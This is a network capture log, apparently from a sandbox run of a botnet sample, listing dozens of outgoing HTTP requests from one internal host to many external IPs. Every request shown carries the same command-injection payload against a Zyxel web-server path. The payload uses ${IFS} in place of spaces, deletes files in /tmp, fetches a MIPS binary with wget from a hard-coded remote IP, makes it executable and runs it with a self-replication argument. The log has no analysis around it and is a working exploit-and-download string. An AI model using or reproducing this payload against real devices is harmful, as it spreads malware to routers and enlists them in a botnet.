                                          Jan 14, 2024 15:46:30.311026096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7746192.168.2.234796884.163.32.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311067104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7747192.168.2.2352742140.92.13.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311084986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7748192.168.2.2359298223.123.98.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311115980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7749192.168.2.2335438184.227.95.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311131954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7750192.168.2.236062668.13.19.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311152935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7751192.168.2.234364044.104.239.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311171055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7752192.168.2.2336574117.121.70.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311219931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7753192.168.2.2344254190.17.177.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311240911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7754192.168.2.2344980126.30.95.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311266899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7755192.168.2.2340128124.142.51.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311297894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7756192.168.2.234937282.200.65.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311332941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7757192.168.2.2351352106.176.197.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311358929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7758192.168.2.2336130179.37.200.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311366081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7759192.168.2.233932493.78.14.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311419964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7760192.168.2.2349362208.115.150.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311420918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7761192.168.2.2342296108.217.103.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311451912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7762192.168.2.2353840145.58.143.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311501980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7763192.168.2.235371819.188.249.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311502934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7764192.168.2.235557675.254.216.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311536074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7765192.168.2.234715277.101.150.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311568975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7766192.168.2.2350978100.240.104.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311608076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7767192.168.2.23402885.162.199.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311629057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7768192.168.2.233373032.0.24.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311655045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7769192.168.2.2341428177.204.28.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311686039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7770192.168.2.2335644177.24.74.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311690092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7771192.168.2.233406064.229.127.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311741114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7772192.168.2.235550884.55.156.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311774969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7773192.168.2.2356852145.147.0.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311788082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7774192.168.2.2337958172.217.14.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311786890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7775192.168.2.2333124210.26.31.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311846972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7776192.168.2.235678083.105.190.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311880112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7777192.168.2.2360586146.117.39.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311892986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7778192.168.2.2333934177.135.116.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311922073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7779192.168.2.2343954150.100.104.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311950922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7780192.168.2.2339342123.70.21.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.311969042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7781192.168.2.235762225.178.68.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312002897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7782192.168.2.2340236128.56.117.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312025070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7783192.168.2.234041677.194.149.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312036991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7784192.168.2.233465814.182.250.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312051058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7785192.168.2.2342714160.132.84.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312092066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7786192.168.2.236067857.111.24.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312134027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7787192.168.2.234870812.66.161.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312155962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7788192.168.2.2343414137.219.154.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312175989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7789192.168.2.235993869.102.29.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312201977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7790192.168.2.2347084201.28.84.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312227011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7791192.168.2.2344924124.2.121.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312247038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7792192.168.2.235731089.124.110.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312300920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7793192.168.2.2339870136.170.202.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312318087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7794192.168.2.2356812160.140.200.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312350035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7795192.168.2.233974496.235.152.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312349081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7796192.168.2.2334872145.28.182.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312391996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7797192.168.2.235901853.7.26.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312410116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7798192.168.2.233627834.11.6.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312429905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7799192.168.2.235112625.83.63.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312464952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7800192.168.2.235957267.231.155.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312468052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7801192.168.2.2336926168.79.55.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312519073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7802192.168.2.2356366147.69.2.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312520027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7803192.168.2.2360496124.130.186.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312550068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7804192.168.2.2355078184.230.147.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312594891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7805192.168.2.2360802164.150.59.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312613964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7806192.168.2.234503867.119.163.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312642097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7807192.168.2.2357444137.146.89.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312664032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7808192.168.2.2352726107.252.51.194443
                                          TimestampBytes transferredDirectionData
